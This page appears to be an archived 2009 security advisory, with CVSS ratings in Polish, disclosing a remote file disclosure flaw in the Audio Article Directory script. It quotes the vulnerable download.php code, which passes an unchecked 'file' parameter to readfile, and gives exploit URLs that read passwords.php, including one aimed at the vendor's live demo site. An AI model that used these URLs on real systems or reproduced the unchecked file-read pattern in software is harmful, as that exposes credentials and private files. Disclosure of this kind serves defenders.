Audio Article Directory (file) Remote File Disclosure Vulnerability

2009.07.11
Credit: ThE g0bL!N
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

################################################################################################################# [+] Audio Article Directory Remote File Disclosure Vulnerability [+] Discovered By ThE g0bL!N Vendor:http://audioarticledirectory.com ################################################################################################################# Poc --- Download.php <? $file = "./".$_GET['file']; => one header('Content-Description: File Transfer'); header('Content-Type: application/force-download'); header("Content-Disposition: attachment; filename=\"".basename($file)."\";"); header('Content-Length: ' . filesize($file)); @readfile($file) OR die(); => 2 ?> Exploit ---- http://victim/download.php?file=download.php http://victim/download.php?file=./passwords.php Demo ---- http://audioarticledirectory.com/demo/download.php?file=./passwords.php ################################################################################################################

Referencje:

http://www.vupen.com/english/advisories/2009/1738
http://www.milw0rm.com/exploits/9041
http://secunia.com/advisories/35609


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top